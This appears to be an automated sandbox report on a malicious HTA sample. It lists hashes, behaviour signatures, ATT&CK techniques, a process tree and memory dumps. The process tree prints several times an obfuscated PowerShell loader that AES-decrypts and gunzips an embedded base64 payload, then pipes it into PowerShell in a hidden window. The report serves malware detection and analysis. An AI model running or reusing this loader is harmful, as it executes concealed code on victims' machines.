ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b

General

Target

ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b.hta
Size

1.3MB
MD5

9c63ac93a4b34f999a4283409af471ed
SHA1

4b03914c7cbb4bc61e6097846e3cc49bad153140
SHA256

ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b
SHA512

f712e7b1d528dd989b860a04dd057cfd4c92152a6f2f35df5176bf3db7fb7a4a994849c7bab9c61003ecf5a8cc52197c88237c5475aaa04ad0031fb0929e6843
SSDEEP

3072:PSE1iZfQZUcaJgF4oHDgXN4Wy5iAlb2t5YRyrR3Ry/4dE4J0Yut3n8E:PSE1iuZU0lcXiWazUtlTZ0ht3n8E

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1960	powershell.exe
1960	powershell.exe
1960	powershell.exe
2584	powershell.exe
2796	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 1960	2072	mshta.exe	29
PID 2072 wrote to memory of 1960	2072	mshta.exe	29
PID 2072 wrote to memory of 1960	2072	mshta.exe	29
PID 2072 wrote to memory of 1960	2072	mshta.exe	29
PID 1960 wrote to memory of 2800	1960	powershell.exe	33
PID 1960 wrote to memory of 2800	1960	powershell.exe	33
PID 1960 wrote to memory of 2800	1960	powershell.exe	33
PID 1960 wrote to memory of 2800	1960	powershell.exe	33
PID 2800 wrote to memory of 2584	2800	cmd.exe	31
PID 2800 wrote to memory of 2584	2800	cmd.exe	31
PID 2800 wrote to memory of 2584	2800	cmd.exe	31
PID 2800 wrote to memory of 2584	2800	cmd.exe	31
PID 2800 wrote to memory of 2796	2800	cmd.exe	30
PID 2800 wrote to memory of 2796	2800	cmd.exe	30
PID 2800 wrote to memory of 2796	2800	cmd.exe	30
PID 2800 wrote to memory of 2796	2800	cmd.exe	30

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ff67692abc453dbbc9c8d70bb6d623197171fd4604d82b6adccc53c2e1db4d9b.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq | powershell - }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c powershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq | powershell -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $zQnYK = 'AAAAAAAAAAAAAAAAAAAAACXupjrcv5ymMTmzsb9HMj07g0fGYk2bbVGWdYfCvOdwpdgs3KfPBEGflsg4MYw7wGvpkM9EJZH7F6vXugnc2Lz8KIiGf03nygEs55hK43MDHMMgyNslGWtSzy7Yfiq6G9uIVqYBZpXFfmUZgtCvSGCzt7tckibs0i23AyyDkoy0dDCwTMryCdzyYQRVgUjfHYU145udUimQ0TwkwAmjzFVeCCW+IQnodfAy3x19IvCgMHB1/7dsyclFh+gWpQ+iQUxS1WTmVYc8sSR8GAwt7ZWSnGqo9+wZspkmVDW+vNOyr1nbI1ENdgDd/Vie7Q47nePVzyykP0WORqguPXpSH/O9kld7HXQ+Dgad9lLP0dWwRudTYUFfP6uApJb8EGgfX5FPWzKIyqWQXxjYE3egEBzFzyOVat/eyCz1xyaHXMZNBSY/pJ4W57DTWQM/fHDLVKAZYrK+ZVj3FjnGNucBPhxgXMz7SnZb4J+nL4BrcgQ4kWRtffTvi3C60/nED5s/Hzpm567v1oC5ULWlyI6KuEB/XPedLe9iM3waBDbD12EIL9da5QOQv3bM1QHDsWfotmKsFyUrDwkmAOIb5JZ9VW+d8ZEnSFsbdeQgHDUt147oUHGoGQfquMcoCKS9I1k7cDjIVlslxtvdw4cq2M62VWFKlCpvsFkRKiVtGQ0xTgECkRjGw8FOIc7O0PeU0he13srDyg80LcAK0FbL/TrVLZ/MW+6CTnbL2RjoGOiPaGXPyvZpSwNA/V7rAfjwoQ0wXPAEfhBw4p7eWaKQKH/l2pMIwimecm+NIQLe/AlvTUivadjBkzB+r+mWbVZ1KKOdjj87WtPNlvmAX0aH4YV1WZnpNdeyHQ8QQzPxZs4ESiFnS2tJEO5oPZzUKxoGULupJTg3qDjrvizbY92amhetyETM+N3nSC2Yy7uQhOSUZqgARp0gg3Z8cq9hk0F59VLIqGcsUjxwnbuLd4UiNaonNgNahyabt1Pzilx+8c5/XEy0g/4YdsOQnIRBAu0WXJLmsxkoSHq3JuZXEgpOHZTiPL2Y2tiML+aAM5vUpar6eiOtigWXqUUbc+YUHJmDvUW7R5cDAGjT52ysT9Zg8BDvYmmo5FMNtbmZPF7/sCKPduUP';$SsVIx = 'Y1JzVWdra0xsVUF3THl6ZGxuaFhucktwSGJhTmdod0E=';$HUHUVe = New-Object 'System.Security.Cryptography.AesManaged';$HUHUVe.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HUHUVe.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HUHUVe.BlockSize = 128;$HUHUVe.KeySize = 256;$HUHUVe.Key = [System.Convert]::FromBase64String($SsVIx);$LTpyn = [System.Convert]::FromBase64String($zQnYK);$jBYKFano = $LTpyn[0..15];$HUHUVe.IV = $jBYKFano;$pZHBtYCTs = $HUHUVe.CreateDecryptor();$qfwLxAoVP = $pZHBtYCTs.TransformFinalBlock($LTpyn, 16, $LTpyn.Length - 16);$HUHUVe.Dispose();$SRohYcy = New-Object System.IO.MemoryStream( , $qfwLxAoVP );$jlLrbjuo = New-Object System.IO.MemoryStream;$auncLVdzc = New-Object System.IO.Compression.GzipStream $SRohYcy, ([IO.Compression.CompressionMode]::Decompress);$auncLVdzc.CopyTo( $jlLrbjuo );$auncLVdzc.Close();$SRohYcy.Close();[byte[]] $cQoYS = $jlLrbjuo.ToArray();$lBjpq = [System.Text.Encoding]::UTF8.GetString($cQoYS);$lBjpq
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a5a454e2089fe4a70c83522aeb718b1d

SHA1
d21857577aa7fa047b8c13424ccc0c9d134d989b

SHA256
eefab11dc7e2119971f789cf6fa5d1647c881fab11a4b9befe7aa0d5f059b8a3

SHA512
edafe302004353f3e28cf46d7691746168394369911ee5e68cb919632c988cbd1878389bca9e9ee947e6188508bc9a3a6878c40c326c59d3358bbac8b831b3d2

Download Submit
memory/1960-3-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-5-0x0000000002B80000-0x0000000002BC0000-memory.dmp

Filesize
256KB

Download
memory/1960-9-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/1960-11-0x0000000002B80000-0x0000000002BC0000-memory.dmp

Filesize
256KB

Download
memory/1960-19-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/2584-30-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/2584-32-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/2584-31-0x0000000002A10000-0x0000000002A50000-memory.dmp

Filesize
256KB

Download
memory/2584-34-0x0000000002A10000-0x0000000002A50000-memory.dmp

Filesize
256KB

Download
memory/2584-33-0x0000000002A10000-0x0000000002A50000-memory.dmp

Filesize
256KB

Download
memory/2584-39-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/2796-35-0x0000000002DA0000-0x0000000002DE0000-memory.dmp

Filesize
256KB

Download
memory/2796-38-0x0000000002DA0000-0x0000000002DE0000-memory.dmp

Filesize
256KB

Download
memory/2796-37-0x0000000002DA0000-0x0000000002DE0000-memory.dmp

Filesize
256KB

Download
memory/2796-36-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download
memory/2796-40-0x0000000072390000-0x000000007293B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing